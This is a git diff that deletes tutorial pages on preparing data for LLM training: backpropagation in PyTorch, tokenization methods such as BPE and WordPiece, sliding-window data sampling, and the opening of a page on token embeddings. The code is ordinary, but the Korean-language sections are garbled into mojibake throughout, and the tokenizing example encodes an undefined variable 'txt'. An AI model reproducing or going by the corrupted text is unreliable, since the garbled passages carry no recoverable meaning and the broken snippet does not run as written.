ํ•˜๊ฐ•๋ฒ•)์„ ์‚ฌ์šฉํ•˜์—ฌ ๋งค๊ฐœ๋ณ€์ˆ˜๋ฅผ ์—…๋ฐ์ดํŠธํ•ฉ๋‹ˆ๋‹ค. - -### **3. ์ˆ˜ํ•™์  ํ‘œํ˜„** - -ํ•˜๋‚˜์˜ ์€๋‹‰์ธต์„ ๊ฐ€์ง„ ๊ฐ„๋‹จํ•œ ์‹ ๊ฒฝ๋ง์„ ๊ณ ๋ คํ•ด ๋ณด์‹ญ์‹œ์˜ค: - -
- -### **4. PyTorch ๊ตฌํ˜„** - -PyTorch๋Š” autograd ์—”์ง„์„ ํ†ตํ•ด ์ด ๊ณผ์ •์„ ๊ฐ„์†Œํ™”ํ•ฉ๋‹ˆ๋‹ค. -```python -import torch -import torch.nn as nn -import torch.optim as optim - -# Define a simple neural network -class SimpleNet(nn.Module): -def __init__(self): -super(SimpleNet, self).__init__() -self.fc1 = nn.Linear(10, 5) # Input layer to hidden layer -self.relu = nn.ReLU() -self.fc2 = nn.Linear(5, 1) # Hidden layer to output layer -self.sigmoid = nn.Sigmoid() - -def forward(self, x): -h = self.relu(self.fc1(x)) -y_hat = self.sigmoid(self.fc2(h)) -return y_hat - -# Instantiate the network -net = SimpleNet() - -# Define loss function and optimizer -criterion = nn.BCELoss() -optimizer = optim.SGD(net.parameters(), lr=0.01) - -# Sample data -inputs = torch.randn(1, 10) -labels = torch.tensor([1.0]) - -# Training loop -optimizer.zero_grad() # Clear gradients -outputs = net(inputs) # Forward pass -loss = criterion(outputs, labels) # Compute loss -loss.backward() # Backward pass (compute gradients) -optimizer.step() # Update parameters - -# Accessing gradients -for name, param in net.named_parameters(): -if param.requires_grad: -print(f"Gradient of {name}: {param.grad}") -``` -In this code: - -- **Forward Pass:** ๋„คํŠธ์›Œํฌ์˜ ์ถœ๋ ฅ์„ ๊ณ„์‚ฐํ•ฉ๋‹ˆ๋‹ค. -- **Backward Pass:** `loss.backward()`๋Š” ์†์‹ค์— ๋Œ€ํ•œ ๋ชจ๋“  ๋งค๊ฐœ๋ณ€์ˆ˜์˜ ๊ธฐ์šธ๊ธฐ๋ฅผ ๊ณ„์‚ฐํ•ฉ๋‹ˆ๋‹ค. -- **Parameter Update:** `optimizer.step()`๋Š” ๊ณ„์‚ฐ๋œ ๊ธฐ์šธ๊ธฐ๋ฅผ ๊ธฐ๋ฐ˜์œผ๋กœ ๋งค๊ฐœ๋ณ€์ˆ˜๋ฅผ ์—…๋ฐ์ดํŠธํ•ฉ๋‹ˆ๋‹ค. - -### **5. Understanding Backward Pass** - -์—ญ์ „ํŒŒ ๋™์•ˆ: - -- PyTorch๋Š” ๊ณ„์‚ฐ ๊ทธ๋ž˜ํ”„๋ฅผ ์—ญ์ˆœ์œผ๋กœ ํƒ์ƒ‰ํ•ฉ๋‹ˆ๋‹ค. -- ๊ฐ ์—ฐ์‚ฐ์— ๋Œ€ํ•ด ์ฒด์ธ ๋ฃฐ์„ ์ ์šฉํ•˜์—ฌ ๊ธฐ์šธ๊ธฐ๋ฅผ ๊ณ„์‚ฐํ•ฉ๋‹ˆ๋‹ค. -- ๊ธฐ์šธ๊ธฐ๋Š” ๊ฐ ๋งค๊ฐœ๋ณ€์ˆ˜ ํ…์„œ์˜ `.grad` ์†์„ฑ์— ๋ˆ„์ ๋ฉ๋‹ˆ๋‹ค. - -### **6. Advantages of Automatic Differentiation** - -- **Efficiency:** ์ค‘๊ฐ„ ๊ฒฐ๊ณผ๋ฅผ ์žฌ์‚ฌ์šฉํ•˜์—ฌ ์ค‘๋ณต ๊ณ„์‚ฐ์„ ํ”ผํ•ฉ๋‹ˆ๋‹ค. -- **Accuracy:** ๊ธฐ๊ณ„ ์ •๋ฐ€๋„๊นŒ์ง€ ์ •ํ™•ํ•œ ๋„ํ•จ์ˆ˜๋ฅผ ์ œ๊ณตํ•ฉ๋‹ˆ๋‹ค. -- **Ease of Use:** ๋„ํ•จ์ˆ˜์˜ ์ˆ˜๋™ ๊ณ„์‚ฐ์„ ์ œ๊ฑฐํ•ฉ๋‹ˆ๋‹ค. diff --git a/src/todo/llm-training-data-preparation/1.-tokenizing.md b/src/todo/llm-training-data-preparation/1.-tokenizing.md deleted file mode 100644 index e1f592a3d..000000000 --- a/src/todo/llm-training-data-preparation/1.-tokenizing.md +++ /dev/null @@ -1,95 +0,0 @@ -# 1. ํ† ํฐํ™” - -## ํ† ํฐํ™” - -**ํ† ํฐํ™”**๋Š” ํ…์ŠคํŠธ์™€ ๊ฐ™์€ ๋ฐ์ดํ„ฐ๋ฅผ ๋” ์ž‘๊ณ  ๊ด€๋ฆฌ ๊ฐ€๋Šฅํ•œ ์กฐ๊ฐ์ธ _ํ† ํฐ_์œผ๋กœ ๋‚˜๋ˆ„๋Š” ๊ณผ์ •์ž…๋‹ˆ๋‹ค. ๊ฐ ํ† ํฐ์€ ๊ณ ์œ ํ•œ ์ˆซ์ž ์‹๋ณ„์ž(ID)๊ฐ€ ํ• ๋‹น๋ฉ๋‹ˆ๋‹ค. ์ด๋Š” ๊ธฐ๊ณ„ ํ•™์Šต ๋ชจ๋ธ, ํŠนํžˆ ์ž์—ฐ์–ด ์ฒ˜๋ฆฌ(NLP)๋ฅผ ์œ„ํ•œ ํ…์ŠคํŠธ ์ค€๋น„์˜ ๊ธฐ๋ณธ ๋‹จ๊ณ„์ž…๋‹ˆ๋‹ค. - -> [!TIP] -> ์ด ์ดˆ๊ธฐ ๋‹จ๊ณ„์˜ ๋ชฉํ‘œ๋Š” ๋งค์šฐ ๊ฐ„๋‹จํ•ฉ๋‹ˆ๋‹ค: **์ž…๋ ฅ์„ ์˜๋ฏธ ์žˆ๋Š” ๋ฐฉ์‹์œผ๋กœ ํ† ํฐ(IDs)์œผ๋กœ ๋‚˜๋ˆ„๊ธฐ**์ž…๋‹ˆ๋‹ค. - -### **ํ† ํฐํ™” ์ž‘๋™ ๋ฐฉ์‹** - -1. **ํ…์ŠคํŠธ ๋ถ„ํ• :** -- **๊ธฐ๋ณธ ํ† ํฌ๋‚˜์ด์ €:** ๊ฐ„๋‹จํ•œ ํ† ํฌ๋‚˜์ด์ €๋Š” ํ…์ŠคํŠธ๋ฅผ ๊ฐœ๋ณ„ ๋‹จ์–ด์™€ ๊ตฌ๋‘์ ์œผ๋กœ ๋‚˜๋ˆ„๊ณ  ๊ณต๋ฐฑ์„ ์ œ๊ฑฐํ•  ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค. -- _์˜ˆ:_\ -ํ…์ŠคํŠธ: `"Hello, world!"`\ -ํ† ํฐ: `["Hello", ",", "world", "!"]` -2. **์–ดํœ˜ ์ƒ์„ฑ:** -- ํ† ํฐ์„ ์ˆซ์ž ID๋กœ ๋ณ€ํ™˜ํ•˜๊ธฐ ์œ„ํ•ด **์–ดํœ˜**๊ฐ€ ์ƒ์„ฑ๋ฉ๋‹ˆ๋‹ค. ์ด ์–ดํœ˜๋Š” ๋ชจ๋“  ๊ณ ์œ  ํ† ํฐ(๋‹จ์–ด ๋ฐ ๊ธฐํ˜ธ)์„ ๋‚˜์—ดํ•˜๊ณ  ๊ฐ ํ† ํฐ์— ํŠน์ • ID๋ฅผ ํ• ๋‹นํ•ฉ๋‹ˆ๋‹ค. -- **ํŠน์ˆ˜ ํ† ํฐ:** ๋‹ค์–‘ํ•œ ์‹œ๋‚˜๋ฆฌ์˜ค๋ฅผ ์ฒ˜๋ฆฌํ•˜๊ธฐ ์œ„ํ•ด ์–ดํœ˜์— ์ถ”๊ฐ€๋œ ํŠน์ˆ˜ ๊ธฐํ˜ธ์ž…๋‹ˆ๋‹ค: -- `[BOS]` (์‹œํ€€์Šค ์‹œ์ž‘): ํ…์ŠคํŠธ์˜ ์‹œ์ž‘์„ ๋‚˜ํƒ€๋ƒ…๋‹ˆ๋‹ค. -- `[EOS]` (์‹œํ€€์Šค ๋): ํ…์ŠคํŠธ์˜ ๋์„ ๋‚˜ํƒ€๋ƒ…๋‹ˆ๋‹ค. -- `[PAD]` (ํŒจ๋”ฉ): ๋ฐฐ์น˜์˜ ๋ชจ๋“  ์‹œํ€€์Šค๋ฅผ ๋™์ผํ•œ ๊ธธ์ด๋กœ ๋งŒ๋“ค๊ธฐ ์œ„ํ•ด ์‚ฌ์šฉ๋ฉ๋‹ˆ๋‹ค. -- `[UNK]` (์•Œ ์ˆ˜ ์—†์Œ): ์–ดํœ˜์— ์—†๋Š” ํ† ํฐ์„ ๋‚˜ํƒ€๋ƒ…๋‹ˆ๋‹ค. -- _์˜ˆ:_\ -`"Hello"`๊ฐ€ ID `64`์— ํ• ๋‹น๋˜๊ณ , `","`๊ฐ€ `455`, `"world"`๊ฐ€ `78`, `"!"`๊ฐ€ `467`์ด๋ผ๋ฉด:\ -`"Hello, world!"` โ†’ `[64, 455, 78, 467]` -- **์•Œ ์ˆ˜ ์—†๋Š” ๋‹จ์–ด ์ฒ˜๋ฆฌ:**\ -`"Bye"`์™€ ๊ฐ™์€ ๋‹จ์–ด๊ฐ€ ์–ดํœ˜์— ์—†์œผ๋ฉด `[UNK]`๋กœ ๋Œ€์ฒด๋ฉ๋‹ˆ๋‹ค.\ -`"Bye, world!"` โ†’ `["[UNK]", ",", "world", "!"]` โ†’ `[987, 455, 78, 467]`\ -_(์—ฌ๊ธฐ์„œ `[UNK]`์˜ ID๋Š” `987`๋ผ๊ณ  ๊ฐ€์ •ํ•ฉ๋‹ˆ๋‹ค)_ - -### **๊ณ ๊ธ‰ ํ† ํฐํ™” ๋ฐฉ๋ฒ•** - -๊ธฐ๋ณธ ํ† ํฌ๋‚˜์ด์ €๋Š” ๊ฐ„๋‹จํ•œ ํ…์ŠคํŠธ์— ์ž˜ ์ž‘๋™ํ•˜์ง€๋งŒ, ํŠนํžˆ ํฐ ์–ดํœ˜์™€ ์ƒˆ๋กœ์šด ๋˜๋Š” ํฌ๊ท€ํ•œ ๋‹จ์–ด๋ฅผ ์ฒ˜๋ฆฌํ•˜๋Š” ๋ฐ ํ•œ๊ณ„๊ฐ€ ์žˆ์Šต๋‹ˆ๋‹ค. ๊ณ ๊ธ‰ ํ† ํฐํ™” ๋ฐฉ๋ฒ•์€ ํ…์ŠคํŠธ๋ฅผ ๋” ์ž‘์€ ํ•˜์œ„ ๋‹จ์œ„๋กœ ๋‚˜๋ˆ„๊ฑฐ๋‚˜ ํ† ํฐํ™” ํ”„๋กœ์„ธ์Šค๋ฅผ ์ตœ์ ํ™”ํ•˜์—ฌ ์ด๋Ÿฌํ•œ ๋ฌธ์ œ๋ฅผ ํ•ด๊ฒฐํ•ฉ๋‹ˆ๋‹ค. - -1. **๋ฐ”์ดํŠธ ์Œ ์ธ์ฝ”๋”ฉ(BPE):** -- **๋ชฉ์ :** ์–ดํœ˜์˜ ํฌ๊ธฐ๋ฅผ ์ค„์ด๊ณ  ํฌ๊ท€ํ•˜๊ฑฐ๋‚˜ ์•Œ ์ˆ˜ ์—†๋Š” ๋‹จ์–ด๋ฅผ ์ž์ฃผ ๋ฐœ์ƒํ•˜๋Š” ๋ฐ”์ดํŠธ ์Œ์œผ๋กœ ๋‚˜๋ˆ„์–ด ์ฒ˜๋ฆฌํ•ฉ๋‹ˆ๋‹ค. -- **์ž‘๋™ ๋ฐฉ์‹:** -- ๊ฐœ๋ณ„ ๋ฌธ์ž๋ฅผ ํ† ํฐ์œผ๋กœ ์‹œ์ž‘ํ•ฉ๋‹ˆ๋‹ค. -- ๊ฐ€์žฅ ์ž์ฃผ ๋ฐœ์ƒํ•˜๋Š” ํ† ํฐ ์Œ์„ ๋ฐ˜๋ณต์ ์œผ๋กœ ๋ณ‘ํ•ฉํ•˜์—ฌ ๋‹จ์ผ ํ† ํฐ์œผ๋กœ ๋งŒ๋“ญ๋‹ˆ๋‹ค. -- ๋” ์ด์ƒ ๋ณ‘ํ•ฉํ•  ์ˆ˜ ์žˆ๋Š” ์ž์ฃผ ๋ฐœ์ƒํ•˜๋Š” ์Œ์ด ์—†์„ ๋•Œ๊นŒ์ง€ ๊ณ„์†ํ•ฉ๋‹ˆ๋‹ค. -- **์žฅ์ :** -- ๋ชจ๋“  ๋‹จ์–ด๊ฐ€ ๊ธฐ์กด ํ•˜์œ„ ๋‹จ์–ด ํ† ํฐ์„ ๊ฒฐํ•ฉํ•˜์—ฌ ํ‘œํ˜„๋  ์ˆ˜ ์žˆ์œผ๋ฏ€๋กœ `[UNK]` ํ† ํฐ์ด ํ•„์š” ์—†์Šต๋‹ˆ๋‹ค. -- ๋” ํšจ์œจ์ ์ด๊ณ  ์œ ์—ฐํ•œ ์–ดํœ˜์ž…๋‹ˆ๋‹ค. -- _์˜ˆ:_\ -`"playing"`์€ `"play"`์™€ `"ing"`๊ฐ€ ์ž์ฃผ ๋ฐœ์ƒํ•˜๋Š” ํ•˜์œ„ ๋‹จ์–ด๋ผ๋ฉด `["play", "ing"]`๋กœ ํ† ํฐํ™”๋  ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค. -2. **WordPiece:** -- **์‚ฌ์šฉ ๋ชจ๋ธ:** BERT์™€ ๊ฐ™์€ ๋ชจ๋ธ. -- **๋ชฉ์ :** BPE์™€ ์œ ์‚ฌํ•˜๊ฒŒ, ์•Œ ์ˆ˜ ์—†๋Š” ๋‹จ์–ด๋ฅผ ์ฒ˜๋ฆฌํ•˜๊ณ  ์–ดํœ˜ ํฌ๊ธฐ๋ฅผ ์ค„์ด๊ธฐ ์œ„ํ•ด ๋‹จ์–ด๋ฅผ ํ•˜์œ„ ๋‹จ์œ„๋กœ ๋‚˜๋ˆ•๋‹ˆ๋‹ค. -- **์ž‘๋™ ๋ฐฉ์‹:** -- ๊ฐœ๋ณ„ ๋ฌธ์ž์˜ ๊ธฐ๋ณธ ์–ดํœ˜๋กœ ์‹œ์ž‘ํ•ฉ๋‹ˆ๋‹ค. -- ํ›ˆ๋ จ ๋ฐ์ดํ„ฐ์˜ ๊ฐ€๋Šฅ์„ฑ์„ ๊ทน๋Œ€ํ™”ํ•˜๋Š” ๊ฐ€์žฅ ์ž์ฃผ ๋ฐœ์ƒํ•˜๋Š” ํ•˜์œ„ ๋‹จ์–ด๋ฅผ ๋ฐ˜๋ณต์ ์œผ๋กœ ์ถ”๊ฐ€ํ•ฉ๋‹ˆ๋‹ค. -- ์–ด๋–ค ํ•˜์œ„ ๋‹จ์–ด๋ฅผ ๋ณ‘ํ•ฉํ• ์ง€ ๊ฒฐ์ •ํ•˜๊ธฐ ์œ„ํ•ด ํ™•๋ฅ  ๋ชจ๋ธ์„ ์‚ฌ์šฉํ•ฉ๋‹ˆ๋‹ค. -- **์žฅ์ :** -- ๊ด€๋ฆฌ ๊ฐ€๋Šฅํ•œ ์–ดํœ˜ ํฌ๊ธฐ์™€ ํšจ๊ณผ์ ์ธ ๋‹จ์–ด ํ‘œํ˜„ ์‚ฌ์ด์˜ ๊ท ํ˜•์„ ์œ ์ง€ํ•ฉ๋‹ˆ๋‹ค. -- ํฌ๊ท€ํ•˜๊ณ  ๋ณตํ•ฉ์ ์ธ ๋‹จ์–ด๋ฅผ ํšจ์œจ์ ์œผ๋กœ ์ฒ˜๋ฆฌํ•ฉ๋‹ˆ๋‹ค. -- _์˜ˆ:_\ -`"unhappiness"`๋Š” ์–ดํœ˜์— ๋”ฐ๋ผ `["un", "happiness"]` ๋˜๋Š” `["un", "happy", "ness"]`๋กœ ํ† ํฐํ™”๋  ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค. -3. **์œ ๋‹ˆ๊ทธ๋žจ ์–ธ์–ด ๋ชจ๋ธ:** -- **์‚ฌ์šฉ ๋ชจ๋ธ:** SentencePiece์™€ ๊ฐ™์€ ๋ชจ๋ธ. -- **๋ชฉ์ :** ๊ฐ€์žฅ ๊ฐ€๋Šฅ์„ฑ์ด ๋†’์€ ํ•˜์œ„ ๋‹จ์–ด ํ† ํฐ ์ง‘ํ•ฉ์„ ๊ฒฐ์ •ํ•˜๊ธฐ ์œ„ํ•ด ํ™•๋ฅ  ๋ชจ๋ธ์„ ์‚ฌ์šฉํ•ฉ๋‹ˆ๋‹ค. -- **์ž‘๋™ ๋ฐฉ์‹:** -- ์ž ์žฌ์ ์ธ ํ† ํฐ์˜ ํฐ ์ง‘ํ•ฉ์œผ๋กœ ์‹œ์ž‘ํ•ฉ๋‹ˆ๋‹ค. -- ํ›ˆ๋ จ ๋ฐ์ดํ„ฐ์˜ ๋ชจ๋ธ ํ™•๋ฅ ์„ ๊ฐ€์žฅ ์ ๊ฒŒ ๊ฐœ์„ ํ•˜๋Š” ํ† ํฐ์„ ๋ฐ˜๋ณต์ ์œผ๋กœ ์ œ๊ฑฐํ•ฉ๋‹ˆ๋‹ค. -- ๊ฐ ๋‹จ์–ด๊ฐ€ ๊ฐ€์žฅ ๊ฐ€๋Šฅ์„ฑ์ด ๋†’์€ ํ•˜์œ„ ๋‹จ์œ„๋กœ ํ‘œํ˜„๋˜๋Š” ์–ดํœ˜๋ฅผ ์ตœ์ข…ํ™”ํ•ฉ๋‹ˆ๋‹ค. -- **์žฅ์ :** -- ์œ ์—ฐํ•˜๋ฉฐ ์–ธ์–ด๋ฅผ ๋” ์ž์—ฐ์Šค๋Ÿฝ๊ฒŒ ๋ชจ๋ธ๋งํ•  ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค. -- ์ข…์ข… ๋” ํšจ์œจ์ ์ด๊ณ  ๊ฐ„๊ฒฐํ•œ ํ† ํฐํ™”๋ฅผ ์ œ๊ณตํ•ฉ๋‹ˆ๋‹ค. -- _์˜ˆ:_\ -`"internationalization"`์€ `["international", "ization"]`๊ณผ ๊ฐ™์€ ๋” ์ž‘๊ณ  ์˜๋ฏธ ์žˆ๋Š” ํ•˜์œ„ ๋‹จ์–ด๋กœ ํ† ํฐํ™”๋  ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค. - -## ์ฝ”๋“œ ์˜ˆ์ œ - -๋‹ค์Œ์€ [https://github.com/rasbt/LLMs-from-scratch/blob/main/ch02/01_main-chapter-code/ch02.ipynb](https://github.com/rasbt/LLMs-from-scratch/blob/main/ch02/01_main-chapter-code/ch02.ipynb)์—์„œ ๊ฐ€์ ธ์˜จ ์ฝ”๋“œ ์˜ˆ์ œ๋ฅผ ํ†ตํ•ด ์ด๋ฅผ ๋” ์ž˜ ์ดํ•ดํ•ด ๋ด…์‹œ๋‹ค. -```python -# Download a text to pre-train the model -import urllib.request -url = ("https://raw.githubusercontent.com/rasbt/LLMs-from-scratch/main/ch02/01_main-chapter-code/the-verdict.txt") -file_path = "the-verdict.txt" -urllib.request.urlretrieve(url, file_path) - -with open("the-verdict.txt", "r", encoding="utf-8") as f: -raw_text = f.read() - -# Tokenize the code using GPT2 tokenizer version -import tiktoken -token_ids = tiktoken.get_encoding("gpt2").encode(txt, allowed_special={"[EOS]"}) # Allow the user of the tag "[EOS]" - -# Print first 50 tokens -print(token_ids[:50]) -#[40, 367, 2885, 1464, 1807, 3619, 402, 271, 10899, 2138, 257, 7026, 15632, 438, 2016, 257, 922, 5891, 1576, 438, 568, 340, 373, 645, 1049, 5975, 284, 502, 284, 3285, 326, 11, 287, 262, 6001, 286, 465, 13476, 11, 339, 550, 5710, 465, 12036, 11, 6405, 257, 5527, 27075, 11] -``` -## References - -- [https://www.manning.com/books/build-a-large-language-model-from-scratch](https://www.manning.com/books/build-a-large-language-model-from-scratch) diff --git a/src/todo/llm-training-data-preparation/2.-data-sampling.md b/src/todo/llm-training-data-preparation/2.-data-sampling.md deleted file mode 100644 index 9909261e1..000000000 --- a/src/todo/llm-training-data-preparation/2.-data-sampling.md +++ /dev/null @@ -1,240 +0,0 @@ -# 2. Data Sampling - -## **Data Sampling** - -**Data Sampling** is a crucial process in preparing data for training large language models (LLMs) like GPT. It involves organizing text data into input and target sequences that the model uses to learn how to predict the next word (or token) based on the preceding words. Proper data sampling ensures that the model effectively captures language patterns and dependencies. - -> [!TIP] -> The goal of this second phase is very simple: **Sample the input data and prepare it for the training phase usually by separating the dataset into sentences of a specific length and generating also the expected response.** - -### **Why Data Sampling Matters** - -LLMs such as GPT are trained to generate or predict text by understanding the context provided by previous words. To achieve this, the training data must be structured in a way that the model can learn the relationship between sequences of words and their subsequent words. This structured approach allows the model to generalize and generate coherent and contextually relevant text. - -### **Key Concepts in Data Sampling** - -1. **Tokenization:** Breaking down text into smaller units called tokens (e.g., words, subwords, or characters). -2. **Sequence Length (max_length):** The number of tokens in each input sequence. -3. **Sliding Window:** A method to create overlapping input sequences by moving a window over the tokenized text. -4. **Stride:** The number of tokens the sliding window moves forward to create the next sequence. - -### **Step-by-Step Example** - -Let's walk through an example to illustrate data sampling. - -**Example Text** - -```arduino -"Lorem ipsum dolor sit amet, consectetur adipiscing elit." -``` - -**Tokenization** - -Assume we use a **basic tokenizer** that splits the text into words and punctuation marks: - -```vbnet -Tokens: ["Lorem", "ipsum", "dolor", "sit", "amet,", "consectetur", "adipiscing", "elit."] -``` - -**Parameters** - -- **Max Sequence Length (max_length):** 4 tokens -- **Sliding Window Stride:** 1 token - -**Creating Input and Target Sequences** - -1. **Sliding Window Approach:** - - **Input Sequences:** Each input sequence consists of `max_length` tokens. - - **Target Sequences:** Each target sequence consists of the tokens that immediately follow the corresponding input sequence. -2. **Generating Sequences:** - -
Window PositionInput SequenceTarget Sequence
1["Lorem", "ipsum", "dolor", "sit"]["ipsum", "dolor", "sit", "amet,"]
2["ipsum", "dolor", "sit", "amet,"]["dolor", "sit", "amet,", "consectetur"]
3["dolor", "sit", "amet,", "consectetur"]["sit", "amet,", "consectetur", "adipiscing"]
4["sit", "amet,", "consectetur", "adipiscing"]["amet,", "consectetur", "adipiscing", "elit."]
- -3. **Resulting Input and Target Arrays:** - - - **Input:** - - ```python - [ - ["Lorem", "ipsum", "dolor", "sit"], - ["ipsum", "dolor", "sit", "amet,"], - ["dolor", "sit", "amet,", "consectetur"], - ["sit", "amet,", "consectetur", "adipiscing"], - ] - ``` - - - **Target:** - - ```python - [ - ["ipsum", "dolor", "sit", "amet,"], - ["dolor", "sit", "amet,", "consectetur"], - ["sit", "amet,", "consectetur", "adipiscing"], - ["amet,", "consectetur", "adipiscing", "elit."], - ] - ``` - -**Visual Representation** - -
Token PositionToken
1Lorem
2ipsum
3dolor
4sit
5amet,
6consectetur
7adipiscing
8elit.
- -**Sliding Window with Stride 1:** - -- **First Window (Positions 1-4):** \["Lorem", "ipsum", "dolor", "sit"] โ†’ **Target:** \["ipsum", "dolor", "sit", "amet,"] -- **Second Window (Positions 2-5):** \["ipsum", "dolor", "sit", "amet,"] โ†’ **Target:** \["dolor", "sit", "amet,", "consectetur"] -- **Third Window (Positions 3-6):** \["dolor", "sit", "amet,", "consectetur"] โ†’ **Target:** \["sit", "amet,", "consectetur", "adipiscing"] -- **Fourth Window (Positions 4-7):** \["sit", "amet,", "consectetur", "adipiscing"] โ†’ **Target:** \["amet,", "consectetur", "adipiscing", "elit."] - -**Understanding Stride** - -- **Stride of 1:** The window moves forward by one token each time, resulting in highly overlapping sequences. This can lead to better learning of contextual relationships but may increase the risk of overfitting since similar data points are repeated. -- **Stride of 2:** The window moves forward by two tokens each time, reducing overlap. This decreases redundancy and computational load but might miss some contextual nuances. -- **Stride Equal to max_length:** The window moves forward by the entire window size, resulting in non-overlapping sequences. This minimizes data redundancy but may limit the model's ability to learn dependencies across sequences. - -**Example with Stride of 2:** - -Using the same tokenized text and `max_length` of 4: - -- **First Window (Positions 1-4):** \["Lorem", "ipsum", "dolor", "sit"] โ†’ **Target:** \["ipsum", "dolor", "sit", "amet,"] -- **Second Window (Positions 3-6):** \["dolor", "sit", "amet,", "consectetur"] โ†’ **Target:** \["sit", "amet,", "consectetur", "adipiscing"] -- **Third Window (Positions 5-8):** \["amet,", "consectetur", "adipiscing", "elit."] โ†’ **Target:** \["consectetur", "adipiscing", "elit.", "sed"] _(Assuming continuation)_ - -## Code Example - -Let's understand this better from a code example from [https://github.com/rasbt/LLMs-from-scratch/blob/main/ch02/01_main-chapter-code/ch02.ipynb](https://github.com/rasbt/LLMs-from-scratch/blob/main/ch02/01_main-chapter-code/ch02.ipynb): - -```python -# Download the text to pre-train the LLM -import urllib.request -url = ("https://raw.githubusercontent.com/rasbt/LLMs-from-scratch/main/ch02/01_main-chapter-code/the-verdict.txt") -file_path = "the-verdict.txt" -urllib.request.urlretrieve(url, file_path) - -with open("the-verdict.txt", "r", encoding="utf-8") as f: - raw_text = f.read() - -""" -Create a class that will receive some params lie tokenizer and text -and will prepare the input chunks and the target chunks to prepare -the LLM to learn which next token to generate -""" -import torch -from torch.utils.data import Dataset, DataLoader - -class GPTDatasetV1(Dataset): - def __init__(self, txt, tokenizer, max_length, stride): - self.input_ids = [] - self.target_ids = [] - - # Tokenize the entire text - token_ids = tokenizer.encode(txt, allowed_special={"<|endoftext|>"}) - - # Use a sliding window to chunk the book into overlapping sequences of max_length - for i in range(0, len(token_ids) - max_length, stride): - input_chunk = token_ids[i:i + max_length] - target_chunk = token_ids[i + 1: i + max_length + 1] - self.input_ids.append(torch.tensor(input_chunk)) - self.target_ids.append(torch.tensor(target_chunk)) - - def __len__(self): - return len(self.input_ids) - - def __getitem__(self, idx): - return self.input_ids[idx], self.target_ids[idx] - - -""" -Create a data loader which given the text and some params will -prepare the inputs and targets with the previous class and -then create a torch DataLoader with the info -""" - -import tiktoken - -def create_dataloader_v1(txt, batch_size=4, max_length=256, - stride=128, shuffle=True, drop_last=True, - num_workers=0): - - # Initialize the tokenizer - tokenizer = tiktoken.get_encoding("gpt2") - - # Create dataset - dataset = GPTDatasetV1(txt, tokenizer, max_length, stride) - - # Create dataloader - dataloader = DataLoader( - dataset, - batch_size=batch_size, - shuffle=shuffle, - drop_last=drop_last, - num_workers=num_workers - ) - - return dataloader - - -""" -Finally, create the data loader with the params we want: -- The used text for training -- batch_size: The size of each batch -- max_length: The size of each entry on each batch -- stride: The sliding window (how many tokens should the next entry advance compared to the previous one). The smaller the more overfitting, usually this is equals to the max_length so the same tokens aren't repeated. -- shuffle: Re-order randomly -""" -dataloader = create_dataloader_v1( - raw_text, batch_size=8, max_length=4, stride=1, shuffle=False -) - -data_iter = iter(dataloader) -first_batch = next(data_iter) -print(first_batch) - -# Note the batch_size of 8, the max_length of 4 and the stride of 1 -[ -# Input -tensor([[ 40, 367, 2885, 1464], - [ 367, 2885, 1464, 1807], - [ 2885, 1464, 1807, 3619], - [ 1464, 1807, 3619, 402], - [ 1807, 3619, 402, 271], - [ 3619, 402, 271, 10899], - [ 402, 271, 10899, 2138], - [ 271, 10899, 2138, 257]]), -# Target -tensor([[ 367, 2885, 1464, 1807], - [ 2885, 1464, 1807, 3619], - [ 1464, 1807, 3619, 402], - [ 1807, 3619, 402, 271], - [ 3619, 402, 271, 10899], - [ 402, 271, 10899, 2138], - [ 271, 10899, 2138, 257], - [10899, 2138, 257, 7026]]) -] - -# With stride=4 this will be the result: -[ -# Input -tensor([[ 40, 367, 2885, 1464], - [ 1807, 3619, 402, 271], - [10899, 2138, 257, 7026], - [15632, 438, 2016, 257], - [ 922, 5891, 1576, 438], - [ 568, 340, 373, 645], - [ 1049, 5975, 284, 502], - [ 284, 3285, 326, 11]]), -# Target -tensor([[ 367, 2885, 1464, 1807], - [ 3619, 402, 271, 10899], - [ 2138, 257, 7026, 15632], - [ 438, 2016, 257, 922], - [ 5891, 1576, 438, 568], - [ 340, 373, 645, 1049], - [ 5975, 284, 502, 284], - [ 3285, 326, 11, 287]]) -] -``` - -## References - -- [https://www.manning.com/books/build-a-large-language-model-from-scratch](https://www.manning.com/books/build-a-large-language-model-from-scratch) - diff --git a/src/todo/llm-training-data-preparation/3.-token-embeddings.md b/src/todo/llm-training-data-preparation/3.-token-embeddings.md deleted file mode 100644 index ec4441210..000000000 --- a/src/todo/llm-training-data-preparation/3.-token-embeddings.md +++ /dev/null @@ -1,203 +0,0 @@ -# 3. ํ† ํฐ ์ž„๋ฒ ๋”ฉ - -## ํ† ํฐ ์ž„๋ฒ ๋”ฉ - -ํ…์ŠคํŠธ ๋ฐ์ดํ„ฐ๋ฅผ ํ† ํฐํ™”ํ•œ ํ›„, GPT์™€ ๊ฐ™์€ ๋Œ€ํ˜• ์–ธ์–ด ๋ชจ๋ธ(LLM)์„ ํ›ˆ๋ จํ•˜๊ธฐ ์œ„ํ•œ ๋ฐ์ดํ„ฐ ์ค€๋น„์˜ ๋‹ค์Œ ์ค‘์š”ํ•œ ๋‹จ๊ณ„๋Š” **ํ† ํฐ ์ž„๋ฒ ๋”ฉ**์„ ์ƒ์„ฑํ•˜๋Š” ๊ฒƒ์ž…๋‹ˆ๋‹ค. ํ† ํฐ ์ž„๋ฒ ๋”ฉ์€ ์ด์‚ฐ ํ† ํฐ(์˜ˆ: ๋‹จ์–ด ๋˜๋Š” ํ•˜์œ„ ๋‹จ์–ด)์„ ๋ชจ๋ธ์ด ์ฒ˜๋ฆฌํ•˜๊ณ  ํ•™์Šตํ•  ์ˆ˜ ์žˆ๋Š” ์—ฐ์†์ ์ธ ์ˆ˜์น˜ ๋ฒกํ„ฐ๋กœ ๋ณ€ํ™˜ํ•ฉ๋‹ˆ๋‹ค. ์ด ์„ค๋ช…์€ ํ† ํฐ ์ž„๋ฒ ๋”ฉ, ์ดˆ๊ธฐํ™”, ์‚ฌ์šฉ๋ฒ• ๋ฐ ๋ชจ๋ธ์ด ํ† ํฐ ์‹œํ€€์Šค๋ฅผ ์ดํ•ดํ•˜๋Š” ๋ฐ ๋„์›€์„ ์ฃผ๋Š” ์œ„์น˜ ์ž„๋ฒ ๋”ฉ์˜ ์—ญํ• ์„ 